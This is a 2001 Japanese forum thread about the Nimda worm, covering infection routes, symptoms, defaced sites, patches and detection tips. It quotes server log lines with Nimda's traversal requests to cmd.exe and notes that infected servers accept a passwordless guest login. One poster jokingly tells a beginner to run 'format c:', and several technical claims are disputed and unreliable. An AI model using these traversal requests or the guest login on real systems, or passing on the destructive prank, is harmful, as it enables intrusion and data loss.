Nimda !!

午前中からコイツのせいでパニック中・・・

2だ

もう飽きた。

Nimda情報＠symantec

http://www.symantec.com/region/jp/sarcj/data/w/[email protected]

気が付かないうちにウチもやられてるぞゴルァ！！

http://www.ieaj.co.jp/plutonium/

感染ルートは複数みたいだね。メールの添付ファイルに、
ＩＥでのページのブラウス。おまけにＣｏｄｅＲｅｄみたいにIISの
脆弱性をついて侵入増殖。（ﾟдﾟ）ｺﾜｰ

おぃ、MSN！
頼むから、サイトのトップにでかでかと警告をだしてくれよ。

あとファイル共有使って増殖するみたいね。会社のＬＡＮに
感染したノートＰＣが接続されたら、、、、一気に増殖でしょうか。

Nimdaってなんて読むの？

>>10
ニダ！

mはサイレントね（藁

>>9
一気に増殖します
ウチだとファイルサーバ上に3000個近くemlファイルが出来た
フォルダの数だけ出来るからなあ
>>10
ニムダでいいのではないかと

>>12
１０はただの洒落だろう

>>8
激しく同意

１０ＮＧ　１１だった

Nimda ←→ admiN

ttps://www.netsecurity.ne.jp/article/9/2839.html

これ見ると発信元は中国っぽいな。
今話題のアラブ系かと思ったが

駆除ソフトって出回ってますか？
なぜか、1分毎に10秒程度インターネットへの接続が止まるのですが
感染してる証拠でしょうか？

アタックしてきた企業やら大学名言ったらヤバい？

emlファイルってもともとそのフォルダにあったファイルが書き換わってるっぽいんだけど、同じような症状出た人いる？
例えば、
ﾏｲ ﾄﾞｷｭﾒﾝﾄへのプョートニット.eml
というファイルがあるのだが、これはﾏｲ ﾄﾞｷｭﾒﾝﾄへのショートカットが上書きされたっぽいんだけど

>19
いいんでない。。。。。（笑）
三井物産とか？？

>>21
えーと、日本ユニシス・ソフトウェアって結構大きなとこですよね？
ちょっとうれしい（ｵｲ

あとはよく知らない会社と追手門学院（サーバではないけど）

あの、感染してるかどうかってどうすればわかりますか? とりあえず、「*.eml」でハードに検索
かけてみて、ファイルが今日昨日で大量に出ていなければOK？

MSNのサイトをほとんど見たけど、全然情報ないぞ！いいかげんにしろMSN！
俺の時間を返せ！ばかやろう！わかりやすくTOPにもてコイ!!あー
すげームカツク。

>>24
MSNに普通に載っているし。
http://help.msn.co.jp/notice.htm

HTTPでのアタック、第一オクテットは固定みたいだね。

>>25
あれのどこがTOPページなのだ？

>>27
topページから行ける。

>>28
この手の情報を気にしてるやつしか読まねーからほとんど意味無し。

『Code Red』を超える新種ワームだって！
http://japan.cnet.com/News/2001/Item/010919-3.html?mn
＞24
私もそう思った(-_-;)

改竄され、踏み台となったweb
　・msnトップページ
　　http://www.msn.co.jp/
　・オリコ
　　http://www.orico.co.jp/
　・オリコ
　　http://www.orico.co.jp/senden/cm/e1.html
　・山梨学院大学
　　http://www.ygu.ac.jp/
　・山梨学院大学法学部
　　http://www.ygu.ac.jp/guide/hougakuseiji/index.html
　・建設物価メディア株式会社
　　http://www.kensetu-bukka-m.co.jp/
　・建設物価メディア株式会社
　　http://www.kensetu-bukka-m.co.jp/rireki/0109_edit_3.htm
　・株式会社マウント富士インターネット
　　http://www.mfi.or.jp/www/
　・都留信用組合
　　http://www.mfi.or.jp/w3/home0/tsurusin/
　・RESORTHOTEL CAMELOT
　　http://www.mfi.or.jp/camelot/main.htm
　・株式会社ストローカー　ジャパン
　　http://www.mfi.or.jp/sjc/
　・日本囲碁ソフト
　　布石・定石パワー アップデートモジュールのダウンロード
　　http://www.igosoft.co.jp/html/update/jpow2up.html
　・囲碁ソフト　次の一手
　　http://www.igosoft.co.jp/html/UteruNyu/keisan.htm
　・株式会社エルミックシステム
　　http://www.elmic.co.jp/japanese/index.html
　・株式会社タイリクトラベル
　　http://www.tairiku.co.jp/hotel/
　・株式会社タイリクトラベル　TE ANAU　テアナウ　ホテル料金一覧
　　http://www.tairiku.co.jp/hotel/oceania/TEU_trf_A.html
　・JTB GLOBAL ASSISTANCE
　　http://www.jga.co.jp/Indexright.htm
　・マックスバリュ東北株式会社
　　http://www.mv-tohoku.co.jp/
　・株式会社 日東物産
　　http://www.prland.co.jp/
　・株式会社 日本ユニオンシステム
　　http://www.unionsys.co.jp/
　・代官山美容外科
　　http://www.mpint.co.jp/~dky/congress_J.htm
　・RSoundLibrary
　　http://www.crypton.co.jp/Web98/html/10380.html
　・東京工業大学 井口家成 研究室HP内の個人ページ
　　http://www.htsc.ap.titech.ac.jp/member/kawai/test.htm
　・志學館学園
　　http://www.jkajyo.ac.jp/
　・志學館学園
　　http://www.jkajyo.ac.jp/sgn/camp/13kimo.html
　・キャリアプラザ名古屋支店
　　http://www.hito-plaza.com/MM/news010914.htm
　・早稲田大学　嘉納研究室
　　http://www.kano.arch.waseda.ac.jp/
まだまだ、増大中(感染しないようにしてから覗いてね)

>>30 このページわかりやすいね。ＴＮＸ

ウイルス名を逆に読むと、「Ａｄｍｉｎ（政府）」が「２（ｔｏ）」「３Ｗ（第三次世界大戦）」となることから、一部には「同時多発テロ事件と関連している」との見方がある。同長官は「現時点では関連するという証拠はない」と否定した。


［毎日新聞９月１９日

>>33 ウィルス名って発見した奴が名付けるのでしょ？
関係ないんじゃないかな。W32ってWin32の略って
普通思うはずだが。

>>26
使用している機械へのアタックを見てると、これまで22件中、21件までは
おっしゃる通り第１オクテットは同じなのですが、1件違うところがありました。

>>18

うちの場合は、アライドテレシスＡＲ１００というルーターで
フレッツＩＳＤＮ接続ですが、平均２分に１回ルーターが、
リブートを繰り返す状態が続いています。
朝メーカーに問い合わせたところ、メーカーでも調査するが、
うちのＡＲ１００をＨＷリセット掛けてみてとか、ＮＴＴに
回線調査を依頼してくれという対応でした。
それが、先程メーカーから電話があり、この現象がNimdaの
影響ということが判りました。
ＡＲ１００はルーター設定をブラウザを通じて行えるように
なっており、この機能にウィルスが影響を与えているそうです。
当面の対応方法としてはhttpのアクセスを全て遮断すること
でリロード現象は取り合えず無くなるとのことですが....。
現在はメーカーに同様の問い合わせが多数出ているそうです。

対策法はどうするの？
Internet Explorer 5.5Service Pack 2をインストールするだけでいいの？

で、Nimdaに感染した鯖の裏口の入り方はまだ判明してないの？

＞＞３６
くそルータの不良はCodeREDんとき既に広報されていた。
ちゃんと見てない36がわるい。

第一オクテットを固定して
あちこちにhttp port probe２発ずつ撃ってるな

>>38

ユーザー：guest
パス無しでログインするだけ。
管理共有も全部見れたじょ。

あ、言わんほうがよかった？

>>23
同一サブネット内にapacheとかを立てて、attackがこなければ大丈夫(藁

テレビでは未だ一言も触れずｶﾙｰｾﾙなんてやってるしな(;´Д`)

う〜む、Nimda に便乗して NetBIOS への attack もかけられてしまった。
scandeted からの警告
--begin--
Possible UDP port flooding from 200.45.176.173 to xxx.xxx.xxx.xxx
I've counted 40 connections.

First connection was made to 137 port at Wed Sep 19 04:41:41 2001
Last connection was made to 137 port at Wed Sep 19 04:42:03 2001
--end--

つぅか書き込む時に
The firewall has blocked Internet access to your computer
(HTTP) from ton.2ch.net (64.71.133.114) (TCP Port 4186).

The firewall has blocked Internet access to your computer
(TCP Port 8080) from ton.2ch.net (64.71.133.114) (TCP Port 4191).

とか5、6発飛んでくるのはどうゆうこと?

今、ﾆｭｰｽでＭＳＮが感染しましたよってやってるヽ(;´ー｀)ﾉ

今、日本テレビでこのニュースやってます。MSNは素人を相手にしてるんだから、
判りやすくして欲しい。

>>45
不正 proxy かどうかを 80 や 8080 が open になっているか
どうかではんだんしているかららしい。

ネットしてて、知らないＨＰへ逝ってみたら
いきなり「ファイルダウンロードする？って聞かれて
よく見たら「readme.exe」だった。
もちろん、ダウンロードなんてしなかったけど
・・・あ〜、ビックリした。

>>48
ｻﾝｸｽ!

質問。

httpdで、オプション プロクシ/キャッシュのアクセス制御タブを、
アクセス許可=127.0.0.1
アクセス拒否=*.*.*.*
にしたが、これって簡易ファイアウォールになったの？
多分違うんだろうな。

物知りな >>39 さんへ
なんだ〜。知ってたんなら早く教えてくれればいいのに。
もう、くそルーターは捨てることにしたよ。

でもね、CodeRedん時は、「AR100は問題ございません」
てのがメーカーの公式見解だったんだよ。

http://www.allied-telesis.co.jp/support/misc/codered.htm
http://www.allied-telesis.co.jp/support/misc/codered2.htm
http://www.allied-telesis.co.jp/support/misc/codered3.htm

危なっかしいからしばらくマクでアクセスするんだけどいきなり
”xxxx.co.jp/readme.eml”ってウィンドウが開いて妖しい文字がバンバン表示されるよ（ｗ
これって「対策施せよｺﾞﾙｧ」メールしちゃっていいよね

Nimdaすごい勢いだね。
昨日までCodeRedのアタックがが日に１００件程度だったのが昨日は４８０件も来てるよ。

ご質問とご回答
Q.自分の会社のサーバーが被害にあった。MSN からの攻撃が原因ではないか。

A. MSN ではサーバーが直接マイクロソフト社外のサーバーに対して影響を及ぼしたことはないと考えています。
MSN のインターネット上に開いたサーバーは、サーバー機能ではなくそのコンテンツファイルが 9/18 の夜 11 時以降 1 時間ほど感染した状態にありましたが、これにより影響を受けたのは直接このサーバーにアクセスした利用者のコンピュータになります。
なお、利用者のコンピュータが感染するには、ブラウザのバージョンなどいくつかの条件がそろった場合に限られます。

Q.自分のコンピュータが感染しているかどうかどのように確かめられるか。

A.コンピュータのハードディスク内を検索して、"readme.eml" ファイルおよび "readme.exe" ファイルが存在していない場合、そのコンピュータが感染している可能性はほぼありません。
また現時点で感染していない場合でも、今後何かの経路で感染する可能性を排除するために、以下の対策をとってください。

ブラウザのバージョンごとに、最新のサービスパックをインストールする。

インターネット利用中に、「このファイルをダウンロードしますか」という画面が出た場合には、ダウンロードをせずブラウザを終了させる。
ウィルス対策ソフトを導入し、Nimda ワームを駆除することがかのうなウィルス定義ファイルをインストールする。また最新の定義ファイルでコンピュータ内をスキャンする。

ＩＥ６にしといてラッキー・・・！感染しないよね。
あ、・・・OE６は大丈夫か？

あと、ActiveXを無効にすればいいんだと思うがどうよ？

トレンドマイクロが株価を上げてるYo!

シマンテックとかの駆除対策プログラム走らせたら「感染してない」って言った癖に
壁紙が消されちまったぞい！どうなっとるんだ、ｸﾞﾙｧｧｧｧｧ

いまWeb鯖のログみてみたらCodeRedよりすごいね。
202.224.176.4 - - [19/Sep/2001:15:51:00 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-"
202.224.176.4 - - [19/Sep/2001:15:51:05 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-"

こんな大企業からも・・・

W32Nimdaを逆に読むと。
admiN23Wとなり、「政府(admin)へ(2=to)第三次世界大戦(3W)」
で、
「政府は第三次世界大戦へ」と読めるそうです。

>>60 既出。>>33-34

>>56
俺も、昨日ここで話題になってたからMSN覗いてみたけど、ActivX無効にしてたから真っ白なページが出ただけだった。
感染無し！マンセー！

Nimdaばら撒きサイト、逝くなよ！

www.zigen.co.jp
osk.offer-line.co.jp
camping.outdoor.co.jp
www.kddis.ne.jp
vweb1.asaka.ne.jp
ns.tsuruta.co.jp

http://203.252.132.117/

ダブル感染

将来的にIE6も感染する可能性があるのかな。
だとしたら、もっと議論が必要だな。
今日はネットサーフィンはしない。バックアップもとろう。
用心には用心を・・・・ (--;

>>59
毎日新聞あぼーん？

なんか「NEW　MESSAGE／You have 1 message wating for you」
ってウィンドウが出てきたんだけどこれがらみ？

おいおい！　うちのサーバ、トレンドマイクロからnimda来てるよ。
ip003.trendmicro.co.jp - - [18/Sep/2001:22:36:51 +0900] "GET /msadc/..%255c../..%255c../..%255c/ ...

まったく、朝から対策に追われてやっと今昼飯だよ。

あ、ブラウザはJavaスクリプトオフでOKだと思うけど。
荷無駄は既存のページに「readme.eml」をDLさせるJavaスクリプトを入れるから。

それはCodeRed（かその他）に感染してるとだれかが教えてくれてるんだろうよ

>>67
ただの広告だ。それは。

1.ページを表示する段階で、ある種のファイルをダウンロードするように求められる。
2.ページを表示する段階で、ある種のファイルを自動的にダウンロードして実行し、
結果としてハードディスク内に大量のファイルを生成する。

IE5.0は1or2どっち？

-- Nimuda感染経路 --

一次感染
ユーザがこのウイルスによって改ざんされたホームページを訪れると
「readme.eml」（拡張子emlはOutlook Expressのメール形式）を
自動的にオープンさせます。
ユーザのマシンにInternet Explorerのセキュリティホールのパッチが
適用されていない場合、ウイルスに感染してしまいます。
ウイルスは自身のSMTP（メール）エンジンを使用してウイルス付メール
(「readme.exe」という添付ファイル）を自動的に送信し感染を拡大していきます。
同時に、ランダムなＩＰアドレスをアクセスして、
IISのパッチがあたっていないWebサーバの場合、
同様にウイルスを埋め込む攻撃をしかけます。

二次感染
また、ウイルスは感染したマシンのA〜Zまでのドライブにウイルス自身をコピーし、
共有したネットワークドライブを介しても感染を広げます。
同時にウイルスはユーザのマシンの中のHTMLファイルを改ざんし、
JAVAスクリプトを埋め込みますので、そのユーザがHPを公開している場合、
HPを訪れた新たなユーザはウイルスに感染することになります。
ウイルス付メールを受け取った新たなユーザがOutlook ExpressまたはOutlookを利用し、
かつInternet Explorerのセキュリティホールのパッチが適用されていない場合には、
メールを見る（プレビュー機能）だけでウイルスに感染（ダイレクトアクション）します。

-- 引用元 http://www.trendmicro.co.jp/virusinfo/troj_nimda.htm --

>>71
激しくがいしゅつ！
IE5.0のSP1までが２,SP2が１

こんな所まで…
210.150.177.216 - - [19/Sep/2001:16:00:06 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"

IISでアクセス拒否のIPとして登録してもスルーされちゃうのかな？
とりあえず馬鹿みたいにアクセスログが膨らんでムカツくんでけり飛ばしたいんだけど・・・

ウイルスきていません。
WIN２０００だと感染しないのでしょうか？
ちなみにアンチウイルスソフトとファイアーウォール
ともにあります。
ちょっと寂しい感じします。

Nimda対策

対策 １
■Internet Explorer のアップデート
[IEのバージョンの確認は「ヘルプ」メニューの「バージョン情報」で確認]
1.IE5.0、5.01、5.02を使用してる方 --- 5.01SP2 または 5.5SP2へアップデート
http://www.microsoft.com/downloads/release.asp?ReleaseID=28910 (5.01SP2へ)
http://www.microsoft.com/downloads/release.asp?releaseid=32082 (5.5SP2へ)
2.IE5.5を使用している方 --- IE5.5SP2へのアップデート
http://www.microsoft.com/downloads/release.asp?releaseid=32082 (5.5SP2へ)
3.IE5.0以下、それ以外
http://windowsupdate.microsoft.com/?IE でそれぞれ個別の対策。
4.上記全ての方のうち、最新のIE6を導入したい方
http://www.microsoft.com/windows/ie_intl/ja/download/default.htm
--タブブラウザを使用している方も対策が必要です。

対策２
■IISのセキュリティパッチをあてる。
[Win2kpro使用している方でもIISが知らないうちに
インストールされている場合があります。]
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078
で環境に合わせたパッチを入手してパッチをあてる。

◎感染してるかどうかチェックしたい方
■感染チェック
１．Windowsキー+Fキーで検索窓を表示し次のワードで検索『*.eml』『readme.exe』『MEP51B3.TMP.EXE』
発見された場合は感染しています。
２．9/19以降にパターンファイルを更新したNortonAntivirus2001でチェック
　　→readme.exe, readme.emlの感染チェック可能
３．トレンドマイクロのオンラインスキャン実行
http://www.trendmicro.co.jp/hcall/scan.htm
　　→readme.exeの感染チェック可能

ニュース速報板よりコピペ

現在出回っているデマ情報
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000325.htm
・拡張子.emlのファイルとreadme.exeを検索して消せばよい
→そんなことしてもシステムファイルや実行ファイルが感染しているのでムダです、あきらめましょう。
・SP2をインストールすればヨイ
→感染後にインストールしても無意味ですよ〜。
・これはラディンのテロと関係がある
→関係ないと発表されてます。
・MSNのページを見たらやばい、感染する
→既に朝9時頃に対策されました。が、昨晩の夜11時頃から本日朝9時頃まで、
　MSNのトップページを表示させた人でSP2でないIE使用の人は感染の疑いがあります。
・JavaScript切っていれば大丈夫
→感染したページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル（README.EXE）を実行すると感染します。
・IE6、IE5.5SP2だから大丈夫
→これも、ページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル（README.EXE）を実行すると感染します。
・NetscapeNavigatorやOperaだから大丈夫
→くどいようですが、ページを見ても大丈夫なだけであって、感染した人から届いた添付ファイル（README.EXE）を実行すると感染します。
・ICQとかMSN Messengerで感染する
→しません。が、ウイルス付きのファイルを送られてきたらその限りではない。

なんだよ・・・・
ここも
　　while(1){ }
かよ・・・

TROJ_NIMDA.A詳細情報
http://www.trendmicro.co.jp/virusinfo/nimda.htm

>>79
while(1){ }ってどういう意味？

>>81
このページ見ただけでNimdaに感染するということ。

昨日の今日だからまだ出来ないんだろうけど、
感染してしまい、このウィルスを駆除するワクチンはいつ出来て
いつダウンロード出来るのだろう？

>>81
じゃあ、俺も感染しちゃたの？
鬱・・・・（涙

↑
>>82
解答と対策きぼーん！

ドライブを検索したら
２ｃｈのかちゅのログのdatファイルにあったんだけどこれって何？
さっぱりわかんない。やばいの？
今のところ何の不都合もないけど。

>>85
for(;ture;){} ともいう。

16:30頃oricoからアタック有り。
・・・再感染ですか・・・

>>85
Ｃ言語だよ！いちいち騒ぐな！アホ！

>初心者
とりあえず、format:c

からまわ〜りヽ(´ー｀)ﾉ

>>78
いくつか気になる点があるが、俺が間違っているか？

・拡張子.emlのファイルとreadme.exeを検索して消せばよい
→そんなことしてもシステムファイルや実行ファイルが感染しているのでムダです、あきらめましょう。
？システムファイルってiniの事？
　Nimda.dllを削除する事で大丈夫では？
　他のシステムファイルを改竄し、寄生するとの事例は無いと思われる。

・SP2をインストールすればヨイ
→感染後にインストールしても無意味ですよ〜。
？無意味では無いと思うが・・・・・
　SP2適用後に削除しても良いのでは？

・ICQとかMSN Messengerで感染する
→しません。が、ウイルス付きのファイルを送られてきたらその限りではない。
？ICQ経由での感染も心配されているのは本当では？

>>90
ＭＳ−ｄｏｓでいいんでしたっけ。
ありがとうございます！早速やってみます。

>>93
ぜったいやっちゃだめ

結局どんな症状がでるんよ？
感染してるかどうかすぐわかるものなの？
昨日深夜12時ごろMSNみちゃったけど・・・
とりあえず、Readme.exeもReadme.emlも検索されないんだけど・・・。

ちょっと不安です。

今頃93はあぼーんになっているだろう。
合掌・・・・

>>92
詳細忘れたが、DLLファイルのいくつが*.emlファイルに置き換わる。
よってそのファイルを消してもＤＬＬファイルが復活しないのでダメ
あと*.exeファイルのほとんどが書き換えられ感染するので現実的には
消して済む問題ではない。
>ICQ経由での感染も心配されているのは本当では？
確かにこれは可能性が指摘されているだけでまだはっきりしない。

>>90はNimdaより凶悪。初心者かわいそうだＹＯ・・・・

うちの会社、就業中にも関わらず警告アナウンスがｱﾀﾖ

っていうか、セキュリティー板の奴ってＣ言語も知らないの？

他にも知らない奴、目つむって手挙げろ！！

とりあえず、MSNに入ったときには、
・JavaとActivXはOFFだったような気がします。
・IE5.5SP1でした。
・入ったときは真っ白な画面で何も出ませんでした。
以上から、感染してるのでしょうか？

感染はしてなかったけど、WINNTフォルダが
Admin$みたいな名前で共有されてた。
他にこうなった人いない？

>>95
・ファイルの破壊。
・ネットワークの情報量が増えて麻痺する。
感染してるか否かはわからん。
スマソ。。。

>>93、来なくなったね・・・・
馬鹿すぎる・・・たぶん感染してなかったのに・・・

>>97
DLLが置き換わると書いてあるソースをきぼーん！

>>95
なら、心配するな！

結局、Nimdaは感染力が強いけどクライアントの中身を削除したりするタイプではない。
但し、インターネット全体として考えた場合は負荷を増大させるので非常に「悪質」なだけと俺は思うが・・・
結局は、サーバーをターゲットとしたワームであり、クライアントは単なる感染媒体だと思うのだが、間違っているか？

>>103 >>105
ありがとう。
安心して寝れます。
おやすみ。

>>105
でも将来的には亜種が現れるかもしれんな。
こういう技術があって、セキュリティーホールがあったということが問題。

>>105
http://www.symantec.co.jp/region/jp/sarcj/data/w/[email protected]
ソースってこれじゃないの？

>>105
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM

nimdaかよっ！

思ったより深刻だよね。感染したら、完全に正常化しようと思ったら
フォーマット&再インストールしかないよね。？間違ってる？

＞EXEファイルにはワームが前方追加されます。
これが最悪だな。ワクチンできも、ＥＸＥファイル書き換えるなんて
信用できないし。困ったもんだ。

そぉーす
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM

ライコスとエキサイトのメールサーバーはダウンしてない？

>>108 >>109
ありがと！
これの情報はIIS側が稼動しているマシンかと思ってた・・・

て言う事は、トレンドマイクロの情報は嘘ばっかり？
http://www.trendmicro.co.jp/virusinfo/nimda.htm
「単体で動作する一個の独立したプログラムであり、他のファイルへの感染活動はありません。検出したファイルは単純に削除してください。 」

>>111
確かに他のファイルに感染して置き換えたりしてるのなら深刻。

＞102
それ感染してる恐れ有り…。
ttp://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
をみれ。

俺も感染したよー。
何故だ、何故なんだー！

MXでclone CD落として実行したんだけど、それと関係あるのかな？

>>112
ライコスは最近の大量メールでの障害の続きでは？
http://www.watch.impress.co.jp/internet/www/article/2001/0917/free.htm

エキサイトは常に障害あります。（ｗ

昨夜はniftyからログインできなかったのだが、これのせいだったか？

>>117 ＥＸＥ圧縮ファイルだった場合、やばいね。

トレンドマイクロのウイルスバスター更新用サーバがダウンしている模様。

Nimda特需ニダ！

http://headlines.yahoo.co.jp/hl?a=20010919-00000006-vgb-sci

逝ってきます…

ノートンアンチウィルスのパターンファイル、
今日の午後になってから頻繁に更新されてる。
スキャンして安心と思ってる人も、再度確認したほうが良いよ。

http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
の内容が変わっているような気がするが・・・・・

今感染しているサーバやサイトはどこですか？

>>123
今さっき更新したけど日付は18日だ。アメリカ時間なのかな？

>>125
これで、判る
http://search.fresheye.com/?kw=readme%2eeml
後は
http://headlines.yahoo.co.jp/hl?a=20010919-00000002-vgb-sci
でも

「readme.eml」「MEP51B3.TMP.EXE」は無いんだけど
「readme.exe」を検索すると

USER.DAT
フォルダ:C:\WINDOWS
サイズ：1,511,456バイト
更新日時:2001/09/19 17:46

↑が引っかかる…かかか感染してないよね？？？（動揺中）

ドライブを検索したら
２ｃｈのかちゅのログのdatファイルにあったんだけどこれって何？
さっぱりわかんない。やばいの？
今のところ何の不都合もないけど。

だれか教えて・・・寝れないよう

>>129 ただのログデータだと思われ

各クライアントごとに完全な対策しないとwindowsネットワーク共有を
勝手にするんで社内LANで１台感染すると全滅するぞ。
とりあえずfirewallがあるなら80は止めろ。

>>102

僕もWIN NTです。恐らくおんなじ状態ですね
共有しないに設定しても再起動すれば
また共有になってしまう、、、

感染するようなことした覚えないんだけどなぁ。

>>127
ファイルダウン要求されて途中で逃げ帰った。くわばらくわばら。

>>132 Win2Kです。Ａｐａｃｈｅ鯖たててるんだけど、アタック受けたあと
こうならない？$Cとかって管理共有だよね。どっかで管理共有
の設定無効にできたはずだけど、無駄なのかな。
感染してる兆候はないんだけど。

>>132
それは、OSがそういう仕様っつうかなんつーか、、、
感染症状ではないとだけ言っておきましょう。

だ、だれか>>128にも答えてお願い…

>>132

管理共有の止め方

WIN2000 FAQ
http://homepage2.nifty.com/winfaq/wxp/network.html#910

>>136
文字列で検索してないか？
ファイル名で検索するんだぞ。

Windows Update行ったら、
なんか英語書いてあるんですが、おいら英語読めません。
どうすればUpdateできますか？

>>102
それデフォルトです
windows2000はもとからそうなってます。

>>137 ありがと〜

>>138
は！そ、そうなのか…アホすぎる、私。

>>112

>>ＥＸＥファイル書き換えるなんて 信用できないし。困ったもんだ。
>>http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM



つーか、まかふぃーが信用できない。ホントに困るよ。 >>114

McAfeeウィルス対策をコピペでぱくる
http://slashdot.jp/article.pl?sid=01/08/21/0428210





こんなのがこんな時期に急に出るなんて、以前の版は・・？
「ウイルススキャン」のオンライン版　2001.9.7発売
http://www.sourcenext.com/products/vsonline/

売ってるの特打の会社だしさ。

>>143 いや実際に書きかられてる人いるだろ。べつにMcAfeeが
どうって話じゃないよ。

>>144

そんな会社信用できる？　今回もここが一番対応対応遅かったし。

>>102
102の書き込み見てから俺もチェックしてみた
結果だが、全く同じ症状だよ
俺も感染してるっぽい
readme.exeでwinフォルダを検索したが見付からず
名前が変わったるのだろうか？

あと、俺はwin2000ユーザーだ。ちと気になってログインのアカウントを調べてみたら
アドミンとゲストが１個ずつ増えてた(;´Д`)
しかも消せないし(;´Д`)
どうしましょう！？

>>146

そのゲストアカウントにパス無しでログイン出来たら完璧にアウト！

>>140
ってデフォルトでそうなってたの？
鬱だ

146さんは勘違いをしているのと思われます。





　　　　　　　　　・・・W2K使う人はもちっと勉強して欲しい（ﾎﾞｿｯ

>>146
ADMIN$は普通あるだろ、、。

AdministratorとGuestが増えてたってのはおかしいよな？

これを機会に、関係ない不具合も発見＆解消！
な人々が多いと思われ。

いいことだ。

>>131
だから・・・・ガセを流すなよ！
感染した自分自身を共有設定するが、どうやって他のパソコンまで共有化するんだよ！
IISの穴を経由して、IIS稼動中のNTや2Kは共有されるけど、普通の98/Me系は無理だろ〜

win MeユーザーでIEは5.50.4134.0100なんですけど、SP2にしたほうがいいんですか？

>>154
したほうがいい、っつうより、今すぐしろ！

>>153
A〜Zドライブ全部スキャンするらしいから、感染したマシンに共有されてるマシンはヤバイよね。

ネットワークコンピュータを見にいったりはしないんだろうか、、、。

>>153 >>9-11とはケースが違うの？

いや、10と11は関係ないから。

>>9 と >>12だ。すまぬ。

>>157-158
ﾜﾗﾀ

鯖に対策はしてるが、トラフィックを食われてどもならんので、
第一オクテットが同じネットワークからのhttpを遮断決定。

すきーりしたよ。時々来るがな。

＞154
IE6.0の方がIE5.5sp2より軽いよ
http://www.microsoft.com/japan/ie/

>>157
既に共有化してたらネットワーク経由で感染するが、>>131が書いているように、勝手に他のパソコンを共有化して社内LANが一気に感染する事はない。

感染したパソコンがLAN経由で既に共有化されているパソコンへ感染→○
感染したパソコンがLAN経由で他のパソコンを共有設定し感染→×

きっと>>131の会社は全てのパソコンが共有設定されているか・・・
金持ちなんでWin2KでIISを導入済だと思われ（ｗ

>>163 なるほど。納得。ありがと。

ネスケをとりあえず使ってたら大丈夫ですか？

EXEの書換え問題はどうなんだろ。これが一番問題だ。
感染した人ＥＸＥをバイナリファイルで開いて、みてくれないかな。
今朝、ニュース速報のスレでヘッダーになんか書き込まれてるって
人がいたが。

うちはIE4.0sp2いれてるけど関係ないのかな？
MSの技術情報読むと

>影響を受けるソフトウェア :
>Microsoft Internet Explorer 5.01
>Microsoft Internet Explorer 5.5

てあるのだが。。。どうなんでしょうか？

IE5とIE55の場合はSP2をあててないとEXEファイルを自動実行してしまうということでしょ？
他のブラウザでもダウンして実行すれば同じことかと。

メールで感染した場合は、IEのverに関係ないみたい。
うちの会社でIE5.0でNimdaに感染した人がいた。

ヴァージョンは5.50.4134.0100だから
www.microsoft.com/windows/ie/download/critical/Q290108/default.asp
から修正プログラムをダウンロードして開こうとしたら
「必要ありません」って出たんだけど何で？

うちのパソコンで含まれる文字列「Administrator」を検索したら一杯出てきたんですが。

http://61.208.221.9/

>>168
たしかにそうですね。
納得、ありがとうございます

>>143
>「ウイルススキャン」のオンライン版　2001.9.7発売

俺、無償アップデートの対象だったから入れてみたよ。
Nimdaに感染してるページを見に行ったら、表示しようと
した時にちゃんとNimdaを検出してくれたよ。
（もちろん最新のDATにしてからね）
ダウンロードが開始される前に駆除可能だった。
ご参考まで・・・

＞＞168
ネスケでもダウンロードしなければ大丈夫ってことですよね
ありがとうございました

>>149
勉強不足でスマソ…
今回の件で自分がいかに無知だって事が分かったよ
勉強しぃょぅ･･･

しかし、何でアカウントが増えてるんだろう
作った覚えなし。これも最初からついてるのかな？

>>171
システム関連のファイル内にデータとして含まれる文字列の中から
Administrator(管理者)なんて検索したら大量に出てくるにきまってる。

>>175
添付ファイルつきのメールは開かないようにな。

>>166
同意
俺もそれが知りたい
但し、iniの書換え内容だけで判断すると他のexeへ感染しなくても十分感染力はあるから余計な事はしてないと願うだけだが・・

今、テストで感染出来る環境が無いんで試せない。

＞＞178
はい、感謝

昨日MSN見たとき「DLしますか？」みたいなウインドウでて
キャンセルしたんだけど、今日NortonのLiveupdateしてから
スキャンしたらNimdaに感染してるってでちゃった。
IE5.01SP2にしてたのに〜〜！

Nortonで検出されたReadme[1].emlは
C:\WINDOWS\Temporary Internet Filesにあったんだけど
これってやっぱ感染してるんだよね。。。
削除したけどもう無駄だよなぁ。ショックでけぇ。

ちなみに、隣にLAN組んでるPCが二台あるんだけどそっちは感染してなかった。
ZoneAlarmいれてあったからかな。
（ZoneAlarmが起動してるとネットワークコンピュータで相手のPCが見えない）

うちはバージョン5.00だ。とりあえず今の所は感染してないみたい。
でも気をつける。（アクチブエックスや、ジャバスクリプトは切ってる）

兄はIEが使えなくなって、ネスケになってる。
２ｃｈのこのページ見せたら青くなってました。

そういえばヤフオクでメールやり取りした人で
白紙のメールに変な添付ファイルの人がいたんだけど
キモイから即削除して、「あなたのメールが読めません」みたいな
返事を送ったんだけど（ウチはベッキーなんで）
あの人もウィルスかかった人なのかしら？

書いたのウイルスマニア。詳しい奴だね。色んなウイルスのおいしいところ盛り込んでる。
ってーか、パッチ、マメに当てとけばなんてこと無いわけでしょ。
決して新しいバグ突いてる訳じゃないんだし。
クライアント君一番気になる不正なMAIMEヘッダなんて、かなり前じゃん。X-WAVE。
サンプルコード公開してたサイトなんか報告された当初、目茶混んでた。
1週間後にやっと落せたよ。
当初のサンプルコード自体は、ウイルスバスターに引っかかったけど。
・・・添付ファイルや本文、WTC関係のシンパシー求める奴なら尚・・・。

他の実行ファイルに感染する機能もあるのか？

>>181
EXEファイルをダウソしていなければ大丈夫じゃないの？

IE5.5SP2にアップデートするとき最小限のコンポーネントで大丈夫？

>>186
セキュリティパッチは最小限に含まれるからOKなはずだぞ。

サーカムの機能はなぜ入れなかったのだろうか？

>187
ありがとう。

ゾヌアラームって、
実は、効果があるのか無いのかもよくわからないまま
